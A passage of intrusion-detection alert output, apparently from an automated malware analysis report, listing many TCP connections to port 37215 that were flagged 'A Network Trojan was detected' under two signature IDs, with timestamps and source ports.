                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.175137
                  SID:2829579
                  Source Port:52660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.015024
                  SID:2835222
                  Source Port:39920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.048424
                  SID:2835222
                  Source Port:60026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.662238
                  SID:2835222
                  Source Port:36298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.772861
                  SID:2835222
                  Source Port:34588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.723729
                  SID:2835222
                  Source Port:47970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.656574
                  SID:2829579
                  Source Port:58644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.832031
                  SID:2835222
                  Source Port:60534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.565464
                  SID:2829579
                  Source Port:47568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423823
                  SID:2835222
                  Source Port:45198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.530156
                  SID:2835222
                  Source Port:54396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.491059
                  SID:2829579
                  Source Port:53586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.560100
                  SID:2835222
                  Source Port:60482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.219455
                  SID:2835222
                  Source Port:56734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.075080
                  SID:2829579
                  Source Port:59586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.851676
                  SID:2829579
                  Source Port:58768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.564208
                  SID:2829579
                  Source Port:46142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308313
                  SID:2829579
                  Source Port:36752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.776063
                  SID:2829579
                  Source Port:54390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.324879
                  SID:2835222
                  Source Port:41298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.843414
                  SID:2835222
                  Source Port:60556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.879703
                  SID:2835222
                  Source Port:60908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.264352
                  SID:2835222
                  Source Port:45372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505039
                  SID:2835222
                  Source Port:44576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.861773
                  SID:2835222
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619051
                  SID:2829579
                  Source Port:49188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.636807
                  SID:2829579
                  Source Port:54856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.776935
                  SID:2829579
                  Source Port:47478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.800330
                  SID:2835222
                  Source Port:59868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.646163
                  SID:2835222
                  Source Port:55564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.831762
                  SID:2829579
                  Source Port:38126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.158539
                  SID:2829579
                  Source Port:34950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.970301
                  SID:2835222
                  Source Port:40026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.066193
                  SID:2829579
                  Source Port:34252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.770059
                  SID:2829579
                  Source Port:34436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251100
                  SID:2829579
                  Source Port:42496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.080592
                  SID:2835222
                  Source Port:58208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.939278
                  SID:2829579
                  Source Port:48762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412005
                  SID:2835222
                  Source Port:32970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.177795
                  SID:2829579
                  Source Port:57802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.838887
                  SID:2829579
                  Source Port:46776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.002573
                  SID:2829579
                  Source Port:33318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.006085
                  SID:2829579
                  Source Port:60616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.371632
                  SID:2835222
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.418082
                  SID:2829579
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.912600
                  SID:2835222
                  Source Port:38424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587668
                  SID:2829579
                  Source Port:44188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681536
                  SID:2829579
                  Source Port:52490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2835222
                  Source Port:43386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595631
                  SID:2835222
                  Source Port:32862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.861277
                  SID:2829579
                  Source Port:35256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.509517
                  SID:2829579
                  Source Port:59062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.739832
                  SID:2829579
                  Source Port:36768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.877145
                  SID:2835222
                  Source Port:44150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650835
                  SID:2835222
                  Source Port:46922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.651678
                  SID:2829579
                  Source Port:33766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523968
                  SID:2829579
                  Source Port:59594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.894714
                  SID:2829579
                  Source Port:47702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.970965
                  SID:2835222
                  Source Port:49346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.743815
                  SID:2835222
                  Source Port:55388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.644111
                  SID:2835222
                  Source Port:50986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328936
                  SID:2835222
                  Source Port:58628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.543702
                  SID:2829579
                  Source Port:55986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.141035
                  SID:2829579
                  Source Port:38618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.226208
                  SID:2835222
                  Source Port:37938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.829086
                  SID:2829579
                  Source Port:59358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.425890
                  SID:2829579
                  Source Port:53190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.797297
                  SID:2835222
                  Source Port:59576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.471536
                  SID:2835222
                  Source Port:33598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857366
                  SID:2835222
                  Source Port:47910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.461308
                  SID:2835222
                  Source Port:41580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.808905
                  SID:2835222
                  Source Port:59750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186614
                  SID:2829579
                  Source Port:56838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981659
                  SID:2835222
                  Source Port:52202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.889054
                  SID:2835222
                  Source Port:58136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.546125
                  SID:2829579
                  Source Port:35444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.285342
                  SID:2835222
                  Source Port:58188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.640182
                  SID:2835222
                  Source Port:52924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.069445
                  SID:2835222
                  Source Port:56634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.761571
                  SID:2829579
                  Source Port:41082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.022999
                  SID:2835222
                  Source Port:36386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.535495
                  SID:2835222
                  Source Port:46432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198368
                  SID:2835222
                  Source Port:48596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.130427
                  SID:2835222
                  Source Port:54722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.484903
                  SID:2829579
                  Source Port:36408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.876797
                  SID:2829579
                  Source Port:47428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.865761
                  SID:2829579
                  Source Port:58986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376641
                  SID:2835222
                  Source Port:36938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.547817
                  SID:2829579
                  Source Port:37616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.565192
                  SID:2835222
                  Source Port:44774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.020359
                  SID:2829579
                  Source Port:36572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868019
                  SID:2835222
                  Source Port:37890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083690
                  SID:2829579
                  Source Port:54220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.683298
                  SID:2829579
                  Source Port:46742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.942691
                  SID:2829579
                  Source Port:37886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.630891
                  SID:2829579
                  Source Port:53624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.323441
                  SID:2829579
                  Source Port:39678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.294251
                  SID:2829579
                  Source Port:57254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.590326
                  SID:2829579
                  Source Port:40210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.883458
                  SID:2835222
                  Source Port:53228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.124417
                  SID:2829579
                  Source Port:43980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.308441
                  SID:2829579
                  Source Port:33188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.831924
                  SID:2829579
                  Source Port:47654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600154
                  SID:2829579
                  Source Port:39650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.133795
                  SID:2829579
                  Source Port:47172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041240
                  SID:2829579
                  Source Port:40250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.566110
                  SID:2835222
                  Source Port:59274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423950
                  SID:2829579
                  Source Port:34438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867590
                  SID:2835222
                  Source Port:60554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.262409
                  SID:2835222
                  Source Port:55926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592192
                  SID:2829579
                  Source Port:44698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647124
                  SID:2829579
                  Source Port:46444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.911091
                  SID:2835222
                  Source Port:39344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.149235
                  SID:2829579
                  Source Port:60244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.668684
                  SID:2835222
                  Source Port:57590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.825094
                  SID:2835222
                  Source Port:50828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196369
                  SID:2829579
                  Source Port:43182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819309
                  SID:2835222
                  Source Port:35178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.394014
                  SID:2835222
                  Source Port:39138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.054503
                  SID:2835222
                  Source Port:35514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.375796
                  SID:2829579
                  Source Port:47448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.930785
                  SID:2829579
                  Source Port:54848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.017676
                  SID:2829579
                  Source Port:33578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358828
                  SID:2829579
                  Source Port:55780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.872230
                  SID:2829579
                  Source Port:39794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460013
                  SID:2829579
                  Source Port:40308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260584
                  SID:2835222
                  Source Port:49380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.662574
                  SID:2829579
                  Source Port:39208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569844
                  SID:2835222
                  Source Port:54536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.277665
                  SID:2829579
                  Source Port:45842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.600336
                  SID:2835222
                  Source Port:34110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.928888
                  SID:2835222
                  Source Port:41600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.297213
                  SID:2829579
                  Source Port:53150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.562470
                  SID:2835222
                  Source Port:43432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833898
                  SID:2829579
                  Source Port:49330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.723852
                  SID:2829579
                  Source Port:59396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207005
                  SID:2835222
                  Source Port:58606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.224533
                  SID:2829579
                  Source Port:49564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.429054
                  SID:2829579
                  Source Port:46612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.522450
                  SID:2835222
                  Source Port:40094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.636858
                  SID:2829579
                  Source Port:34908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.968818
                  SID:2829579
                  Source Port:42092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.851941
                  SID:2829579
                  Source Port:42976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224405
                  SID:2829579
                  Source Port:57408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.542154
                  SID:2835222
                  Source Port:41180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.757407
                  SID:2829579
                  Source Port:60652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.922365
                  SID:2829579
                  Source Port:44344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.077860
                  SID:2835222
                  Source Port:47878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2835222
                  Source Port:53892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.682663
                  SID:2835222
                  Source Port:34718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.868022
                  SID:2829579
                  Source Port:42792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.280780
                  SID:2835222
                  Source Port:35716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.128775
                  SID:2835222
                  Source Port:50148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.652813
                  SID:2835222
                  Source Port:43618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.143313
                  SID:2835222
                  Source Port:35002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.598573
                  SID:2835222
                  Source Port:37678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589238
                  SID:2829579
                  Source Port:38406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.860039
                  SID:2829579
                  Source Port:44748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.348022
                  SID:2835222
                  Source Port:52558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871447
                  SID:2835222
                  Source Port:50280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.168343
                  SID:2835222
                  Source Port:42508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.189218
                  SID:2829579
                  Source Port:33674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.783128
                  SID:2835222
                  Source Port:53104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.018095
                  SID:2829579
                  Source Port:54774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699441
                  SID:2835222
                  Source Port:60460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036336
                  SID:2835222
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.887347
                  SID:2829579
                  Source Port:49432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.877616
                  SID:2835222
                  Source Port:36822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.424218
                  SID:2829579
                  Source Port:58068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.453748
                  SID:2829579
                  Source Port:59032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.667183
                  SID:2835222
                  Source Port:54544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962280
                  SID:2829579
                  Source Port:49740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752339
                  SID:2829579
                  Source Port:37734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561451
                  SID:2835222
                  Source Port:43006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.285291
                  SID:2835222
                  Source Port:56234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.630428
                  SID:2835222
                  Source Port:41942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.596679
                  SID:2829579
                  Source Port:43964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993007
                  SID:2829579
                  Source Port:56738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.547340
                  SID:2829579
                  Source Port:36954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.350146
                  SID:2835222
                  Source Port:52996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.565861
                  SID:2835222
                  Source Port:40130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.842184
                  SID:2835222
                  Source Port:51986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.454904
                  SID:2835222
